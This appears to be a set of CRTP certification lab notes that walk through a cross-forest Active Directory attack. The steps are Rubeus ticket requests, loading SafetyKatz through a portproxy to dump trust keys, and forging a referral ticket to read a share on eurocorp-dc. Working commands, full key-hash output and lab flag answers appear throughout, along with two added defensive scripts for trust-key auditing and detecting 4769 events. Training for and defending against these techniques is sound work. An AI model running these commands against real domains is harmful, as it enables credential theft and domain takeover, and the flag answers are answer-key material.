Certified Red Team Professional (CRTP) - Notes

20 - LO2️0️

Learning Objective 20

Tasks

1 - With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest

Flag 31 [eurocorp-dc] - Service for which a TGS is requested from eurocorp-dc 🚩

Flag 32 [eurocorp-dc] - Contents of secret.txt on eurocorp-dc 🚩

Solutions

1 - With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest

We need the trust key for the trust between dollarcorp and eurocorp, which can be retrieved using Mimikatz or SafetyKatz.

First of all, start a process with DA privileges. Run the command below from an elevated command prompt:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Run the commands below from the process running as DA to copy Loader.exe to dcorp-dc and use it to extract the trust keys:

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.67
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"
mimikatz(commandline) # lsadump::evasive-trust /patch

Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)

Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 5/19/2025 1:37:28 PM - CLEAR   - 44 09 6f fc 1a 4c 7f 37 6d 28 3d dd 7c 01 38 b3 8a a3 ae 67 21 86 f7 d6 cc 64 7a 84 a4 fb ec 09 63 a5 67 d0 7d 46 ae d9 d3 01 67 9d 00 93 db e6 60 63 36 aa c1 ee 12 18 c0 22 f8 d0 79 b8 b2 c5 71 91 28 98 e2 21 36 09 f5 36 02 bf 9b 60 6e 37 95 8b 79 2c e2 a4 9a a5 55 20 a6 b9 f1 30 b7 71 cb 20 5d 60 8c b9 e8 69 2a 5e cb c3 3e 22 7b a5 e6 08 f1 df 92 d3 a3 ca e0 f5 b2 5a cb 7a ad ea 41 28 a1 ff 5b b7 d3 30 79 b9 95 a0 bb 22 a6 b7 02 f4 2d 2e de fe 7c 53 80 33 5c 81 ea 06 ba c5 7d 48 3e 54 20 87 50 27 d9 07 eb d8 0b ca a6 8b b1 43 92 ca bf 00 8f 57 4f f8 85 ae 90 ab 84 91 ca 46 53 cb 4d 17 af 41 b5 44 16 7f 35 74 4a a3 a0 8e 63 74 ed 0a 8b 4e b1 7f 2e db db 00 07 d9 51 e5 68 62 72 74 29 ad 7f cd e3 2f 73 6b 89 48
        * aes256_hmac       e9a951eb9284fa8fb97d517ee1aa3aa63bedb68f047bdef968fc07909e3d3473
        * aes128_hmac       82479821a01655434a6b58c8a12ede0a
        * rc4_hmac_nt       9efbee4d5451ee87a336fdd844841a60

 [ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 11:05:00 PM - CLEAR   - 75 a4 95 49 95 c5 3d 16 51 d6 dd ea 1b 5e ef a4 e1 4a a4 f6 ad de 59 dd 44 23 8d f7 26 68 e6 4e 6f 47 4c c5 88 ac 28 82 44 2d c4 3d 93 5a 81 d4 1a 59 f5 19 c4 b7 c4 02 8e e6 b7 af 93 2a b9 e3 8d 6c 69 fa bf 89 f7 1b ed 62 7c cf 58 0c 39 9c 5c 81 7d aa 5c f9 83 c8 8e 99 0f 80 db 04 be 05 59 b9 17 23 14 c2 30 69 a5 97 45 98 29 18 bf da ee 67 4b 82 80 ba 46 03 78 ce 7a 25 ea 48 cb 07 c8 8e b4 f2 75 c4 45 47 6e 74 59 5d 95 7a 46 3a a8 87 27 9a 09 4f bd 0e 21 6a 01 a7 3e 6d 30 31 fc f0 e3 00 80 27 96 e6 95 d5 8a 60 71 22 f8 d8 6e 6f f9 5c 31 50 00 ee b6 d2 2f e7 82 97 aa 14 d0 32 07 8a 38 87 66 47 f6 33 3c 34 71 8f 7c f0 8c 79 30 84 35 6c 04 cd 06 fd ed 9f 4a 10 56 6d f1 4d b9 90 45 c8 25 41 a9 7f 15 a8 ea 5b a4 42
        * aes256_hmac       1be6d20275db04c936e2280d803afaf58aca9aabe04664db9484c20206590a0a
        * aes128_hmac       ceb4bb60cc4546c039ca70454cf27321
        * rc4_hmac_nt       9e01158873ab48589848840d3b4f5ba3

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 4/18/2025 9:04:35 PM - CLEAR   - 1a 5f 93 d7 72 ef 03 2a 0f e3 9c 22 ee 65 3f c2 bb 11 51 1d d0 3c 7a fc 91 05 79 cb 2e 27 43 11 67 a8 18 e0 24 0b aa c1 71 0f e4 dc 0c b3 66 84 79 c2 74 f6 b0 88 49 19 90 ea f3 0c 02 1e 59 97 3f aa 42 a9 66 cf 9d a8 bc a4 aa 98 b4 d4 29 c3 aa a8 5e 5a ae 0f 93 21 51 6d fd ff a8 2f da cd 8c 3c fc 4c 1d 2f 51 c4 2e 89 01 20 29 2d 9d c7 40 d5 c7 1d 19 3c 38 38 94 3f 5b 67 a6 e6 68 4b 74 a2 a3 0d 44 0c dd 62 45 e7 01 46 83 0b 15 1d af 5f 0c 81 1e b8 ac eb 6f f2 79 fd 1f db af df cc 28 72 3d 50 a0 e8 50 62 57 22 64 c8 de fe 55 ef 94 b8 1f 54 76 65 7e 8c 0a a4 1b f6 45 03 1f 78 9f 1c de cf 52 c9 34 d2 c9 a1 f9 63 23 43 7a 25 f0 1d a8 b8 9d 25 44 f3 f7 c9 4d e5 2f 88 f9 1d c5 b3 62 59 bf ba e9 ea 97 f5 fb bb a1 82 a2
        * aes256_hmac       6ebf48c7d7ad99b143c9b6ad518396606a395a60dc4165e83233a1c0c5716412
        * aes128_hmac       7217c5114ba08994c10edf30106e5ce8
        * rc4_hmac_nt       5f8e757822d6f6f2977af2dc94135713

 [Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 11:05:00 PM - CLEAR   - f5 ec 63 70 27 4e 2d 3b c9 cf d2 5c aa 42 3f 9e 84 43 1f ad ef 68 6f c0 0e ca 08 9f ee 7e a5 98 15 ca 17 70 e9 ee a5 02 b3 50 f5 9c fe 29 2c c1 f4 96 d3 7b f0 21 62 6b eb 3b 54 bc a3 90 99 e1 d4 1a 1a 0b 97 f1 bf d5 78 da 7e d0 cb 61 77 03 c2 08 c7 9f 9a 86 64 7b a1 0b 98 3c ba 99 bf 14 83 ff c5 f9 37 cb 1a c2 a8 1c 28 85 be 07 93 11 cb cc 35 88 5c 34 e5 d9 a1 0f ad 32 f5 e8 11 07 42 14 be 76 c3 fe 3a 77 a8 04 4c 17 ff 93 19 d0 70 ec c2 c9 0d 00 3b 2d 32 d9 d5 cc 1e f2 e0 f6 46 56 f8 cf 9c 2c 51 d8 15 f9 cd 0c d2 10 92 a8 75 af 26 8c 05 05 64 d1 be 58 03 65 3f c3 ed cd 63 05 ca 20 08 b7 09 d8 22 41 e0 a0 f7 2b 71 b7 48 ae c5 23 5b 50 d4 bf 15 a0 d4 a0 37 7d f3 d4 e3 77 93 e9 21 28 71 3d ad 9c fd 23 ce 6c 00 5d
        * aes256_hmac       8a1e8a22021baf33cf5c186b2b257cace73088402e11545ede9c112545b6c05f
        * aes128_hmac       f97130aff8d849fa56b61a80d77492b0
        * rc4_hmac_nt       e1ff686c5ac2880aaecb34a8c8db19ee


Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:10:07 PM - CLEAR   - c2 86 72 f5 a4 80 98 c4 79 c5 cd 35 31 68 fa 08 a0 b9 96 e7 e9 d4 68 c5 0a 6e 9c f8
        * aes256_hmac       0d13893ad9375052e55276afd3aa59eee6ac13ecbb34ec595551a22850e5a21f
        * aes128_hmac       1f367d7f4a602f7db49b28e8954e38b3
        * rc4_hmac_nt       10abed140ecd1d7926fd8ed52141a4a9

 [ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:10:07 PM - CLEAR   - c2 86 72 f5 a4 80 98 c4 79 c5 cd 35 31 68 fa 08 a0 b9 96 e7 e9 d4 68 c5 0a 6e 9c f8
        * aes256_hmac       677e0e1d4b663a16d24f8b8463d23e21a4ee23d2dab509221bf3444a95902fa1
        * aes128_hmac       54713b68042823a0d642e3c8b55f2bf3
        * rc4_hmac_nt       10abed140ecd1d7926fd8ed52141a4a9

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:03:57 PM - CLEAR   - 5c 54 6e 93 5d f4 37 a8 46 c7 cf 6b 33 6e 1c 39 ed 02 2f f6 4d 28 16 02 5d ec 34 08
        * aes256_hmac       d006160aeebee4bc4736932b02e2021e58e712bb614809a9e5d7a885c830ebf3
        * aes128_hmac       99e79607dc6c200854a32f6421f80e6c
        * rc4_hmac_nt       f3f9994ce98686f98d1dd8b81ec8f2cc

 [Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:03:57 PM - CLEAR   - 5c 54 6e 93 5d f4 37 a8 46 c7 cf 6b 33 6e 1c 39 ed 02 2f f6 4d 28 16 02 5d ec 34 08
        * aes256_hmac       391de5a8a239c71f684355e04665f636c4b412caf5b89d7d1940e06a5a47d101
        * aes128_hmac       d39fd719f0a4e95b7b2a5c39d1c7feb2
        * rc4_hmac_nt       f3f9994ce98686f98d1dd8b81ec8f2cc


Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 5/18/2025 10:03:52 PM - CLEAR   - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
        * aes256_hmac       b1d7c6ebe13f4ab22d32540e056618017544c5b2b2a646c2bd46ce98b954d279
        * aes128_hmac       e0923c5d48609d5521de83fc02ec3e4b
        * rc4_hmac_nt       348f49cf83691a35ea71980994f02170

 [ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:03:52 PM - CLEAR   - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
        * aes256_hmac       b0f0a55ada2dfc87111ddbdc4072a8cc8679f4a5f79242f6510c57df0a65c831
        * aes128_hmac       65770a68dff396a49468fe35cbc98cbe
        * rc4_hmac_nt       348f49cf83691a35ea71980994f02170

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 5/16/2025 9:04:55 PM - CLEAR   - 4f 60 6b c4 51 c2 54 89 39 e3 84 f9 5e 2e 51 61 65 c6 81 64 6b 66 ff 55 41 e5 27 16
        * aes256_hmac       3b0cc0612e0bed52b403f6048bc4cd86233bb75a2848aa6d24385e9b61fad2b1
        * aes128_hmac       0c32942d43e18125da040ada11ee8d5e
        * rc4_hmac_nt       4e8f18911392c26d05bc7044914a6d57

 [Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/16/2025 9:04:55 PM - CLEAR   - 4f 60 6b c4 51 c2 54 89 39 e3 84 f9 5e 2e 51 61 65 c6 81 64 6b 66 ff 55 41 e5 27 16
        * aes256_hmac       7a4cd11bc3ce3f83c5788e7dfe1e9bdd5c0187e2a793f9134e3bc1241497f7fb
        * aes128_hmac       aaaba3a50e251cbafda5bf205e9dd7ec
        * rc4_hmac_nt       4e8f18911392c26d05bc7044914a6d57


mimikatz(commandline) # exit
Bye!
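The output above is long, and the interesting part for both sides is structural: each trusted domain has a current inbound/outbound key pair ([In]/[Out]) and the previous pair ([In-1]/[Out-1]), each with a timestamp. The script below is an added example, not code from the CRTP course or from these notes. It parses that `lsadump::trust` layout, separates intra-forest from inter-forest trusts (where SID filtering applies by default), and flags current trust keys that have not been rotated for more than 30 days. It assumes MONEYCORP.LOCAL is the forest root (inferred from the domain names above) and uses the default 30-day trust password rotation interval as the staleness threshold; the embedded sample is a shortened excerpt of the output above, with the CLEAR blobs truncated.

```python
"""Parse the lsadump::trust text layout and report on trust-key hygiene.

Added example (not part of the CRTP course or these notes). Assumptions:
- MONEYCORP.LOCAL is the forest root (inferred from the domain names above);
- a current trust key older than 30 days is stale (30 days is the default
  automatic trust password rotation interval on Windows).
"""
import re
from datetime import datetime, timedelta

# Constructed, shortened excerpt in the exact layout mimikatz prints above
# (CLEAR blobs truncated; names, SIDs and key hashes copied from this page).
SAMPLE_OUTPUT = """\
Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)

Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 5/19/2025 1:37:28 PM - CLEAR   - 44 09 6f fc
        * aes256_hmac       e9a951eb9284fa8fb97d517ee1aa3aa63bedb68f047bdef968fc07909e3d3473
        * rc4_hmac_nt       9efbee4d5451ee87a336fdd844841a60

 [ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 11:05:00 PM - CLEAR   - 75 a4 95 49
        * rc4_hmac_nt       9e01158873ab48589848840d3b4f5ba3

Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 5/18/2025 10:03:52 PM - CLEAR   - 85 b0 4e 5f
        * rc4_hmac_nt       348f49cf83691a35ea71980994f02170

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 5/16/2025 9:04:55 PM - CLEAR   - 4f 60 6b c4
        * rc4_hmac_nt       4e8f18911392c26d05bc7044914a6d57
"""

RE_CURRENT = re.compile(r"^Current domain:\s+(\S+)\s+\((\S+)\s+/\s+(S-[\d-]+)\)")
RE_DOMAIN = re.compile(r"^Domain:\s+(\S+)\s+\((\S+)\s+/\s+(S-[\d-]+)\)")
RE_SLOT = re.compile(r"^\s*\[\s*(In-1|Out-1|In|Out)\s*\]\s+(\S+)\s+->\s+(\S+)")
RE_STAMP = re.compile(r"^\s*\*\s+(\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2} [AP]M)\s+-\s+CLEAR")
RE_KEY = re.compile(r"^\s*\*\s+(aes256_hmac|aes128_hmac|rc4_hmac_nt)\s+([0-9a-f]+)")


def parse_trust_dump(text):
    """Return (current_domain, records); one record per [In]/[Out]/[In-1]/[Out-1] slot."""
    current, records, domain, sid, rec = None, [], None, None, None
    for line in text.splitlines():
        if m := RE_CURRENT.match(line):
            current = m.group(1)
        elif m := RE_DOMAIN.match(line):
            domain, sid = m.group(1), m.group(3)
        elif m := RE_SLOT.match(line):
            rec = {"trusted_domain": domain, "trusted_sid": sid, "slot": m.group(1),
                   "src": m.group(2), "dst": m.group(3), "set_at": None, "keys": {}}
            records.append(rec)
        elif (m := RE_STAMP.match(line)) and rec is not None:
            rec["set_at"] = datetime.strptime(m.group(1), "%m/%d/%Y %I:%M:%S %p")
        elif (m := RE_KEY.match(line)) and rec is not None:
            rec["keys"][m.group(1)] = m.group(2)
    return current, records


def is_same_forest(domain, forest_root):
    """DNS-suffix heuristic: only valid for a single-tree forest (assumption)."""
    d, r = domain.lower(), forest_root.lower()
    return d == r or d.endswith("." + r)


def stale_trust_keys(records, now, max_age_days=30):
    """(domain, slot) pairs whose *current* key is older than max_age_days."""
    if isinstance(now, str):
        now = datetime.fromisoformat(now)
    limit = timedelta(days=max_age_days)
    return [(r["trusted_domain"], r["slot"]) for r in records
            if r["slot"] in ("In", "Out") and r["set_at"] and now - r["set_at"] > limit]


def trust_report(text, forest_root, now):
    """One line per trust slot plus a warning per stale current key."""
    current, records = parse_trust_dump(text)
    lines = [f"current domain: {current}"]
    for r in records:
        scope = ("intra-forest" if is_same_forest(r["trusted_domain"], forest_root)
                 else "inter-forest (SID filtering on by default)")
        set_at = r["set_at"].date() if r["set_at"] else "?"
        lines.append(f'{r["trusted_domain"]:28} {r["slot"]:5} set {set_at}  {scope}')
    for domain, slot in stale_trust_keys(records, now):
        lines.append(f"WARNING: {slot} key for {domain} is older than 30 days")
    return lines


if __name__ == "__main__":
    print("\n".join(trust_report(SAMPLE_OUTPUT, "MONEYCORP.LOCAL", "2025-06-10")))
```

Feed it the full mimikatz output instead of the excerpt and it lists every trust the same way; the inter-forest label on EUROCORP.LOCAL is exactly why the SID History note further down matters.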

Let's forge a referral ticket. The key we need is the inbound ([In]) trust key for EUROCORP.LOCAL from the output above:

Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 5/18/2025 10:03:52 PM - CLEAR   - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
        * aes256_hmac       b1d7c6ebe13f4ab22d32540e056618017544c5b2b2a646c2bd46ce98b954d279
        * aes128_hmac       e0923c5d48609d5521de83fc02ec3e4b
        * rc4_hmac_nt       348f49cf83691a35ea71980994f02170

Note that we are not injecting any SID History here, as it would be filtered out. Run the command below:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:348f49cf83691a35ea71980994f02170 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap

Copy the base64 encoded ticket from above and use it in the following command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket:<base64_ticket>

Once the ticket is injected, we can access explicitly shared resources on eurocorp-dc.

type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\

Note that the only way to enumerate accessible resources (services on a machine) in eurocorp would be to request a TGS for each one and then attempt to access it.
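That constraint cuts both ways: on eurocorp-dc, every one of those attempts is a Kerberos service ticket request (Security event 4769) from a principal whose realm is not EUROCORP.LOCAL, so the activity in this objective is visible as a foreign-realm Administrator asking for service tickets, followed by a burst of distinct services from the same principal. The script below is an added detection example, not code from the course or these notes. The 4769-style records are constructed (only the fields used here, not real log data), and the local realm name, the privileged-name list, the 5-service threshold and the 10-minute window are assumptions to tune per environment.

```python
"""Spot cross-realm service-ticket probing in Security event 4769 data.

Added example (not part of the CRTP course or these notes). Assumptions:
- records are 4769 events from a DC in EUROCORP.LOCAL, reduced to the
  fields used here (time, account, domain, service name, client address);
- a foreign-realm principal asking for BURST_THRESHOLD distinct services
  within WINDOW is treated as service probing, because the only way to find
  accessible services across a trust is to request a TGS for each candidate.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOCAL_REALM = "EUROCORP.LOCAL"          # realm of the DC that produced the log (assumption)
PRIVILEGED_NAMES = {"administrator"}    # names that should not arrive over a trust unplanned
BURST_THRESHOLD = 5                     # distinct services from one foreign principal ...
WINDOW = timedelta(minutes=10)          # ... within this window

# Constructed 4769-style records (not real log data); sorted by time below.
EVENTS = [
    {"time": "2025-05-20T10:00:01", "account": "ecorp-user1", "domain": "EUROCORP.LOCAL",
     "service": "cifs/eurocorp-fs01.eurocorp.local", "client": "10.0.1.20"},
    {"time": "2025-05-20T10:00:05", "account": "Administrator", "domain": "DOLLARCORP.MONEYCORP.LOCAL",
     "service": "cifs/eurocorp-dc.eurocorp.local", "client": "172.16.100.67"},
    {"time": "2025-05-20T10:00:40", "account": "Administrator", "domain": "DOLLARCORP.MONEYCORP.LOCAL",
     "service": "ldap/eurocorp-dc.eurocorp.local", "client": "172.16.100.67"},
    {"time": "2025-05-20T10:01:10", "account": "Administrator", "domain": "DOLLARCORP.MONEYCORP.LOCAL",
     "service": "host/eurocorp-dc.eurocorp.local", "client": "172.16.100.67"},
    {"time": "2025-05-20T10:01:30", "account": "Administrator", "domain": "DOLLARCORP.MONEYCORP.LOCAL",
     "service": "cifs/eurocorp-fs01.eurocorp.local", "client": "172.16.100.67"},
    {"time": "2025-05-20T10:02:00", "account": "Administrator", "domain": "DOLLARCORP.MONEYCORP.LOCAL",
     "service": "http/eurocorp-web.eurocorp.local", "client": "172.16.100.67"},
    {"time": "2025-05-20T10:05:00", "account": "mcorp-analyst", "domain": "MONEYCORP.LOCAL",
     "service": "cifs/eurocorp-fs01.eurocorp.local", "client": "10.0.5.11"},
]


def principal(ev):
    return f'{ev["account"]}@{ev["domain"].upper()}'


def is_foreign(ev, local_realm=LOCAL_REALM):
    """True when the requesting account's realm is not the DC's own realm."""
    return ev["domain"].upper() != local_realm.upper()


def detect(events, local_realm=LOCAL_REALM, threshold=BURST_THRESHOLD, window=WINDOW):
    """Return alerts for foreign privileged names and cross-realm TGS bursts."""
    alerts, seen_priv, burst_done = [], set(), set()
    recent = defaultdict(deque)          # principal -> (time, service) pairs inside the window
    for ev in sorted(events, key=lambda e: e["time"]):
        if not is_foreign(ev, local_realm):
            continue                     # local-realm requests are normal traffic here
        p = principal(ev)
        t = datetime.fromisoformat(ev["time"])
        if ev["account"].lower() in PRIVILEGED_NAMES and p not in seen_priv:
            seen_priv.add(p)
            alerts.append({"rule": "foreign-privileged-account", "principal": p, "time": ev["time"],
                           "detail": f'requested {ev["service"]} from {ev["client"]}'})
        q = recent[p]
        q.append((t, ev["service"]))
        while q and t - q[0][0] > window:
            q.popleft()                  # drop requests that fell out of the sliding window
        distinct = {s for _, s in q}
        if len(distinct) >= threshold and p not in burst_done:
            burst_done.add(p)            # alert once per principal, not once per event
            alerts.append({"rule": "cross-realm-tgs-burst", "principal": p, "time": ev["time"],
                           "detail": f"{len(distinct)} distinct services within {window}"})
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f'{a["time"]} {a["rule"]:28} {a["principal"]}: {a["detail"]}')
```

The mcorp-analyst record shows the rules are not "alert on every foreign realm": a single cross-trust request from an ordinary name is left alone, while the same foreign principal walking through cifs, ldap, host and other SPNs in a couple of minutes is what trips the burst rule.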

Flag 31 [eurocorp-dc] - Service for which a TGS is requested from eurocorp-dc 🚩

Based on the following command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket:<base64_ticket>

cifs is the service for which a TGS is requested from eurocorp-dc.

Flag 32 [eurocorp-dc] - Contents of secret.txt on eurocorp-dc 🚩

type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt

Dollarcorp DAs can read this!
